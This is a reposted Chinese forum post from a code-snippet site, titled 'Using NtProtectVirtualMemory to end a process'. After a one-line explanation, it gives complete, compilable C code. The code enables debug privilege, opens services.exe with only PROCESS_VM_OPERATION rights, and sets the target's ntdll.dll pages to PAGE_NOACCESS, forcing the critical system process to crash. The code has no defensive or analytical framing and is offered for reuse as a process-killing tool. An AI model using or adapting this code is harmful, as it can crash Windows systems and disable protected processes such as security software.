首页 > 代码库 > 【转】利用NtProtectVirtualMemory结束进程

【转】利用NtProtectVirtualMemory结束进程

标 题 : 【原创】利用NtProtectVirtualMemory结束进程作 者 : KiDebug时 间 : 2011 - 07 - 13, 09 : 37 : 08链 接 : http ://bbs.pediy.com/showthread.php?t=137067 原理很简单,用PROCESS_VM_OPERATION打开目标进程(没必要PROCESS_ALL_ACCESS),把目标进程的ntdll.dll设为不能访问
/** 【作者:KiDebug】* 【空间:http://hi.baidu.com/KiDebug/】*  VC 6.0编译出错请百度:“vc 6.0 unicode”*/#include <stdio.h>#include <Windows.h>#include <Psapi.h>#include <Tlhelp32.h> #pragma comment(lib,"Psapi.lib") typedef NTSTATUS(__stdcall *RtlAdjustPrivilege_)(ULONG Privilege,BOOLEAN Enable,BOOLEAN CurrentThread,PBOOLEAN Enabled);RtlAdjustPrivilege_ RtlAdjustPrivilege = NULL; typedef NTSTATUS(__stdcall *NtProtectVirtualMemory_)(    __in HANDLE ProcessHandle,    __inout PVOID *BaseAddress,    __inout PSIZE_T RegionSize,    __in ULONG NewProtectWin32,    __out PULONG OldProtect    );NtProtectVirtualMemory_ NtProtectVirtualMemory = NULL; ULONG GetPID(WCHAR* proc){    BOOL                working = 0;    PROCESSENTRY32      lppe = { 0 };    ULONG               targetPid = 0;    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);     if (hSnapshot)    {        lppe.dwSize = sizeof(lppe);        working = Process32First(hSnapshot, &lppe);        while (working)        {            if (_wcsicmp(lppe.szExeFile, proc) == 0)            {                targetPid = lppe.th32ProcessID;                break;            }            working = Process32Next(hSnapshot, &lppe);        }    }     CloseHandle(hSnapshot);    return targetPid;}  void main(){    HMODULE     ntdll;    MODULEINFO  ModuleInfo;    ntdll = GetModuleHandle(L"ntdll.dll");    if (!GetModuleInformation((HANDLE)-1, ntdll, &ModuleInfo, sizeof(MODULEINFO)))    {        return;    }     BOOLEAN         Enabled;    RtlAdjustPrivilege = (RtlAdjustPrivilege_)GetProcAddress(ntdll, "RtlAdjustPrivilege");    if (RtlAdjustPrivilege == NULL)    {        return;    }     RtlAdjustPrivilege(20, TRUE, FALSE, &Enabled);      HANDLE hProc = OpenProcess(PROCESS_VM_OPERATION, FALSE, GetPID(L"services.exe"));    if (hProc == NULL)    {        return;    }     NtProtectVirtualMemory = (NtProtectVirtualMemory_)GetProcAddress(ntdll, "NtProtectVirtualMemory");    if (NtProtectVirtualMemory == NULL)    {        return;    }     ULONG   OldProtect;    NtProtectVirtualMemory(hProc, &ModuleInfo.lpBaseOfDll, &ModuleInfo.SizeOfImage, PAGE_NOACCESS, &OldProtect);}

 

【转】利用NtProtectVirtualMemory结束进程